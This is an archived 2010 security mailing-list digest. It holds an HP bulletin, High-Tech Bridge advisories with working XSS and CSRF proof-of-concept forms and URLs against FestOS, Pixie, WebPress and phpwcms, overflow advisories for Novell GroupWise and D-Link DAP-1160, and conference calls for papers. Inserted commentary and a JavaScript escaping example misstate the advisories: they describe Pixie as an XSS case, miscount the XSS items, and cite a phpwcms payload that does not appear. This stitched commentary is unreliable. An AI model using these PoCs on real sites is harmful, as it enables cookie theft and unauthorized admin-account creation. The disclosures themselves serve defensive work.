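html.escape is sufficient only because the value lands in a quoted attribute or in text; an unquoted attribute (as in the phpwcms PoC's `onmouseover=alert(34)`) or a JavaScript or URL context needs its own encoder, and the same audit makes the difference visible.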





[security bulletin] HPSBMA02550 SSRT100170 rev.2 - HP Insight Software Installer for Windows, Local Unauthorized Access to Data, Remote Cross Site Request Forgery (CSRF)

2010-07-15 Thread security-alert
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02282377
Version: 2

HPSBMA02550 SSRT100170 rev.2 - HP Insight Software Installer for Windows, Local 
Unauthorized Access to Data, Remote Cross Site Request Forgery (CSRF)

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2010-07-12
Last Updated: 2010-07-14

Potential Security Impact: Local unauthorized access to data, remote Cross Site 
Request Forgery (CSRF)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Insight 
Software Installer for Windows. The vulnerabilities could be exploited locally 
to allow unauthorized access to data and remotely to allow Cross Site Request 
Forgery (CSRF).

References: CVE-2010-1967 (unauthorized access to data), CVE-2010-1968 (CSRF)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Insight Software Installer for Windows for all versions prior to v6.1

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference        Base Vector                    Base Score
CVE-2010-1967      (AV:L/AC:L/Au:S/C:P/I:P/A:N)   3.2
CVE-2010-1968      (AV:N/AC:M/Au:N/C:P/I:P/A:P)   6.8
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made an update available to resolve the vulnerabilities. The update can 
be downloaded from 
http://h18000.www1.hp.com/products/servers/management/fpdownload.html

HP Insight Software Installer v6.1 or subsequent

PRODUCT SPECIFIC INFORMATION

None

HISTORY
Version:1 (rev.1) - 12 July 2010 Initial release
Version:2 (rev.2) - 14 July 2010 Corrected CVE number in References section

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-al...@hp.com
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.

To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.

HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP products the important security 
information contained in this Bulletin. HP recommends that all users determine 
the applicability of this information to their individual situations and take 
appropriate action. HP does not warrant that this information is necessarily 
accurate or complete for all user situations and, consequently, HP will not be 
responsible for any damages resulting from user's use or disregard of the 
information provided in this Bulletin. To the extent permitted by law, HP 
disclaims all warranties, either express or implied, including the warranties 
of merchantability and fitness for a particular purpose, title and 
non-infringement.

Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial 

XSS vulnerability in FestOS

2010-07-15 Thread advisory
Vulnerability ID: HTB22473
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_festos_1.html
Product: FestOS
Vendor: Skypanther Studios, Inc ( http://festengine.org/ ) 
Vulnerable Version: 2.3b and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the /admin/do_snippets_edit.php 
script to properly sanitize user-supplied input in contents variable. 
Successful exploitation of this vulnerability could result in a compromise of 
the application, theft of cookie-based authentication credentials, disclosure 
or modification of sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:

<form action="http://host/admin/do_snippets_edit.php?tabname=Pages" 
method="post" name="main">
<input type="hidden" name="snippetID" value="1" />
<input type="hidden" name="title" value="Site footer" />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="contents" 
value='footer<script>alert(document.cookie)</script>' />
</form>

<script>
document.main.submit();
</script>





XSRF (CSRF) in Pixie

2010-07-15 Thread advisory
Vulnerability ID: HTB22471
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_pixie_1.html
Product: Pixie
Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ ) 
Vulnerable Version: 1.0.4 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the user privileges script to 
properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of 
the application, theft of cookie-based authentication credentials, disclosure 
or modification of sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:

<form accept-charset="UTF-8" 
action="http://host/admin/index.php?s=settings&x=users" method="post" 
name="main">
<input type="hidden" name="uname" value="test" />
<input type="hidden" name="realname" value="test name2" />
<input type="hidden" name="email" value="myem...@myemaildomain.com" />
<input type="submit" name="user_edit" id="sbmtit" value="Update" />
<input type="hidden" name="privilege" value="2" />
<input type="hidden" name="user_id" value="2" />
</form>
<script>
document.getElementById('sbmtit').click();
</script>





XSS vulnerability in FestOS

2010-07-15 Thread advisory
Vulnerability ID: HTB22472
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_festos.html
Product: FestOS
Vendor: Skypanther Studios, Inc ( http://festengine.org/ ) 
Vulnerable Version: 2.3b and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the /admin/do_pages_edit.php 
script to properly sanitize user-supplied input in title variable. Successful 
exploitation of this vulnerability could result in a compromise of the 
application, theft of cookie-based authentication credentials, disclosure or 
modification of sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:

<form action="http://host/admin/do_pages_edit.php" method="post" name="main">
<input type="hidden" name="pageID" value="2" />
<input type="hidden" name="title" 
value='title<script>alert(document.cookie)</script>' />
<input type="hidden" name="alias" value="home" />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="contents" value='page content here...' />
</form>
<script>
document.main.submit();
</script>





XSRF (CSRF) in Pixie

2010-07-15 Thread advisory
Vulnerability ID: HTB22470
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_pixie.html
Product: Pixie
Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ ) 
Vulnerable Version: 1.0.4 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the user creation script to properly 
verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of 
the application, theft of cookie-based authentication credentials, disclosure 
or modification of sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:

<form accept-charset="UTF-8" 
action="http://host/admin/index.php?s=settings&x=users" method="post" 
name="main">
<input type="hidden" name="uname" value="myusername" />
<input type="hidden" name="realname" value="My Real Name" />
<input type="text" name="email" value="myem...@myemaildomain.com" />
<input type="hidden" name="user_new" value="Save" />
<input type="hidden" name="privilege" value="2" />
</form>
<script>
document.main.submit();
</script>





XSS vulnerability in WebPress

2010-07-15 Thread advisory
Vulnerability ID: HTB22479
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_webpress_1.html
Product: WebPress
Vendor: YWP ( http://www.goywp.com/ ) 
Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the 
admin_page_listings_entries_amd_form.php script to properly sanitize 
user-supplied input in range_listing_id variable. Successful exploitation of 
this vulnerability could result in a compromise of the application, theft of 
cookie-based authentication credentials, disclosure or modification of 
sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:


http://host/path/_system/listings/entries/_pages/admin_page_listings_entries_amd_form.php?range_listing_id=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&listing_id=1






{PRL} Novell Groupwise Webaccess Stack Overflow

2010-07-15 Thread Francis Provencher
#

Application:   Novell Groupwise Webaccess Stack Overflow

Platforms:   Windows, Linux & Netware (GroupWise 7.0, 7.01, 7.02,
7.03x, 7.04, 8.0, 8.01x)

Exploitation:   Remote code execution

CVE Number:

Novell TID:  7006380

Author:   Francis Provencher (Protek Research Lab's)

WebSite:   http://www.protekresearchlab.com/


#

1) Introduction
2) Report Timeline
3) Technical details
4) The Code


#

===
1) Introduction
===

Novell, Inc. is a global software and services company based in
Waltham, Massachusetts. The company specializes in enterprise
operating systems, such as SUSE

Linux Enterprise and Novell NetWare; identity, security, and systems
management solutions; and collaboration solutions, such as Novell
Groupwise and Novell

Pulse.

Novell was instrumental in making the Utah Valley a focus for
technology and software development. Novell technology contributed to
the emergence of local

area networks, which displaced the dominant mainframe computing model
and changed computing worldwide. Today, a primary focus of the company
is on developing

open source software for enterprise clients.

(http://en.wikipedia.org/wiki/Novell)

#


2) Report Timeline


2010-05-27 Vendor Contact
2010-05-28 Vendor Response
2010-07-15 Patch & Release (Groupwise 8.0.2)


#


3) Technical details


The user Proxy feature of Novell GroupWise WebAccess is vulnerable to
a stack overflow exploit. An authenticated user could potentially
trigger it and execute arbitrary code with Root or SYSTEM rights on the
compromised server. To overwrite the stack, 1294 bytes have to be sent
to the user proxy feature.


#

===
4) The Code
===

This issue can be triggered manually;

a

The stack will be overwritten with 0x62626262




#
(PRL-2010-05)


XSRF (CSRF) in phpwcms

2010-07-15 Thread advisory
Vulnerability ID: HTB22476
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_phpwcms.html
Product: phpwcms 
Vendor: Oliver Georgi ( http://www.phpwcms.de/ ) 
Vulnerable Version: 1.4.5 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the phpwcms.php script to properly 
verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of 
the application, theft of cookie-based authentication credentials, disclosure 
or modification of sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:


<form action="http://host/phpwcms.php?do=admin&s=1" name="m" method="POST">
<input type="hidden" name="form_newloginname" value="aaa">
<input type="hidden" name="form_newpassword" value="aaa">
<input type="hidden" name="form_newemail" value="a...@example.com">
<input type="hidden" name="form_newrealname" value="">
<input type="hidden" name="form_feuser" value="2">
<input type="hidden" name="form_active" value="1">
<input type="hidden" name="verification_email" value="1">
<input type="hidden" name="form_aktion" value="create_account">
<input type="hidden" name="Submit" value="send+user+data">
</form>
<script>
document.m.submit();
</script>





XSS vulnerability in WebPress

2010-07-15 Thread advisory
Vulnerability ID: HTB22478
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_webpress.html
Product: WebPress
Vendor: YWP ( http://www.goywp.com/ ) 
Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the 
admin_page_listings_lists_action.php script to properly sanitize 
user-supplied input in id_num_mod variable. Successful exploitation of this 
vulnerability could result in a compromise of the application, theft of 
cookie-based authentication credentials, disclosure or modification of 
sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:


http://host/path/_system/listings/lists/_pages/admin_page_listings_lists_action.php?id_num_mod=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&submit_action=Edit
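The five XSS advisories above (Pixie site settings, FestOS HTB22472 and HTB22473, WebPress HTB22478 and HTB22479) share one root cause: a value the user controls is written back into the admin page's HTML unchanged, whether it was stored first (keywords, title, contents) or reflected straight from the query string (id_num_mod, range_listing_id). The following is an added example written by the editor, not code from High-Tech Bridge or from any of the affected products. It reproduces that pattern next to its fix, HTML-encoding the value at output time for the context it lands in, using the exact payloads from the PoCs. The input template is an assumed stand-in for the real admin views.

```javascript
// Added example (editor's code, not from the High-Tech Bridge advisories
// or from Pixie, FestOS or WebPress). It reproduces the bug pattern the
// XSS advisories describe, a user-controlled value echoed into HTML
// unchanged, next to the fix, HTML-encoding the value at output time for
// the context it lands in. The <input> template is an assumed stand-in
// for the real CMS admin views.

// Stored payload from the Pixie/FestOS PoC forms, and the reflected one
// from the WebPress URL, decoded as the web server would decode it.
const STORED_PAYLOAD = "key1<script>alert(document.cookie)</script>";
const REFLECTED_PAYLOAD = decodeURIComponent(
  "1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E"
);

// Vulnerable pattern: the value is interpolated into a double-quoted
// attribute as-is. The leading '"> of the WebPress payload closes the
// attribute and the tag, so the <script> that follows is parsed as
// markup and runs in the admin's session.
function renderUnsafe(value) {
  return `<input type="text" name="keywords" value="${value}">`;
}

// Entity-encode the five characters that can change meaning in text or
// quoted-attribute context. Done on output only; the stored value is
// left intact, so searching and editing it keep working.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened pattern: identical template, encoded value.
function renderSafe(value) {
  return `<input type="text" name="keywords" value="${escapeHtml(value)}">`;
}

// Check used below: true if the rendered fragment contains markup the
// value introduced, i.e. any < or > left once the wrapper's own outer
// brackets are stripped.
function injectsMarkup(html) {
  const inner = html.slice("<input".length, -1);
  return /[<>]/.test(inner);
}

// Stand-alone run: both renderings for both payloads.
for (const p of [STORED_PAYLOAD, REFLECTED_PAYLOAD]) {
  console.log("unsafe:", renderUnsafe(p), "->", injectsMarkup(renderUnsafe(p)));
  console.log("safe:  ", renderSafe(p), "->", injectsMarkup(renderSafe(p)));
}
```

Note that the fix is encoding, not filtering: stripping `<script>` from the stored value would leave the attribute-breaking `'">` prefix and every other event-handler or tag variant untouched, while encoding the five metacharacters for the output context neutralises all of them.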






ClubHack2010 CFP

2010-07-15 Thread ClubHack
:: Call For Paper ::
Mother of all Indian Hacker's Conferences ClubHack is now in its
fourth year and we again invite all the geeks & hackers around the
world to be a part of the same.

ClubHack2010 opens its CFP today. See http://clubhack.com/2010/cfp

We are expecting a good deep knowledge technical
presentations/demonstrations on topics from the world of Information
Security. These presentations are expected to be of 40 minutes each.
The schedule time for each presenter would be 50 minutes out of which
40 minutes are for the presentation & 10 for the question-answer
sessions. We’d request you to submit the papers keeping the time
constraint in mind.

:: Event ::
Date: 3rd, 4th & 5th December (As Usual the first weekend of December)
Place: Pune, India

We are also hosting the finals of Malcon at ClubHack2010, for more
information & CFP of malcon see http://malcon.org/

3rd December - Malcon workshop
4th December - Keynote by Bruce Schneier & Other talks
5th December - Malcon awards and Other talks
(Event plan may change in future)

:: Scope ::
(includes, but not limited to)
# Protocol / Application based vulnerability in networks and computers
# Firewall Evasion techniques
# Cloud Application Security
# Data Recovery and Incident Response
# Mobile Security (cellular technologies)
# WLAN and Bluetooth Security
# Analysis of malicious code
# Cryptography and Cryptanalysis
# Computer forensics
# Cyber warfare
# Open source hacking toolkit
# Cyber Crime & law
# Hardware mods

:: Exclusion ::
Sales Pitch


:: Deadlines ::
Opening: 15th July 2010
Abstract Submission: 30th October 2010
Announcement of selected papers: 5th November 2010
Full Paper Submission: 15th November 2010

:: Speakers' Privileges ::
Economic Return Ticket - from your nearest international airport to Pune
Accommodation (upto 4 days)
Local Tourism package (in Sahyadri Ranges, Western Ghat)
One extra ticket for the event
No other expenses as we are a not-for-profit group & finding sponsors
in India is tough :)

:: Sponsors ::
That reminds, if you are interested in supporting the event in any
possible way, please write to us spon...@clubhack.com

:: Other details ::
All other details are available at
Event website: http://clubhack.com/2010

:: Submission ::
Check submission details at http://clubhack.com/2010/cfp & send it to
c...@clubhack.com



Thanks
team ClubHack


-- 
This is a non-monitored alias, please do not reply directly.
Please send your mails to i...@clubhack.com


OWASP Appsec Germany Call for Papers

2010-07-15 Thread Tobias Glemser
Hi,

the German section of the Open Web Application Security Project (OWASP)
announces a Call for Presentations (CfP) for the third OWASP AppSec Germany
conference on the 20th of October 2010 in Nuremberg. The conference will
be held in parallel with the IT security exhibition. The conference is
primarily oriented toward a German-speaking audience, but
presentations in English are also welcome. The OWASP AppSec Germany 2010 will
extend the range of typical security conferences with contributions
covering development, operation and test of web-based applications.

Please find the complete CFP including all details here (closes 01 August
2010):

http://www.owasp.org/index.php/OWASP_AppSec_Germany_2010_Conference#tab=Call_for_Papers_-_English_Version

Cheers

Tobias Glemser
Board Member German Chapter OWASP



IS-2010-006 - D-Link DAP-1160 formFilter buffer overflow

2010-07-15 Thread Cristofaro Mune
Security Advisory

IS-2010-006 - D-Link DAP-1160 formFilter buffer overflow



Advisory Information

Published:
2010-07-14

Updated:
2010-07-14

Manufacturer: D-Link
Model: DAP-1160
Firmware version: 1.20b06
  1.30b10
  1.31b01



Vulnerability Details
-

Public References:
Not Assigned


Platform:
Successfully tested on D-Link DAP-1160 loaded with firmware versions:
v120b06, v130b10, v131b01.
Other models and/or firmware versions may be also affected.
Note: Only firmware version major numbers are displayed on the
administration web interface: 1.20, 1.30, 1.31


Background Information:
D-Link DAP-1160 is a wireless access point that allows wireless clients
connectivity to wired networks.
It supports the 802.11b and 802.11g protocols, with WEP, WPA and WPA2.


Summary:
A buffer overflow condition can be triggered by setting URL filtering
for an overly long URL, leading to possible arbitrary code execution or
denial of service. Successful authentication is required in order to
exploit the vulnerability, but attackers can leverage other
vulnerabilities for achieving unauthenticated remote exploitation.


Details:
Changing the device configuration involves sending a properly formatted
POST request to the following URL:
http://IP_ADDR/apply.cgi?formhandler_func

where IP_ADDR is the device IP address and the formhandler_func is a
function, specific to the task to be accomplished, that will handle the
POST parameters present in the request body.

The formFilter() function can be used for applying specific filters to
the communication going through the Access Point, and is not accessible
through any of the links available on the device administration interface.
Nonetheless, the web page available at the following URL

http://IP_ADDR/adv_webfilter.htm

relies on such function for applying URL filters.

One of the functionalities formFilter function allows for is URL
filtering performed on a specific URL, submitted via the above mentioned
web page or by sending a properly formatted POST request.
The provided URL is copied on the stack into a fixed size buffer,
allowing for buffer overflow and possible arbitrary code execution with
root privileges, if an overly long URL is provided.

A successful authentication is required in order to be able to
trigger the vulnerability, but an attacker may leverage the DCC protocol and
authentication bypass vulnerability for achieving unauthenticated remote
exploitation.

Impacts:
Arbitrary code execution
Denial of service


Solutions & Workaround:
Not available



Additional Information
--
Timeline (dd/mm/yy):
17/02/2010: Vulnerability discovered
17/02/2010: No suitable technical/security contact on Global/Regional
website. No contact available on OSVDB website
18/02/2010: Point of contact requested to customer service
--- No response ---
26/05/2010: Vulnerability disclosed at CONFidence 2010
14/07/2010: This advisory


Additional information available at http://www.icysilence.org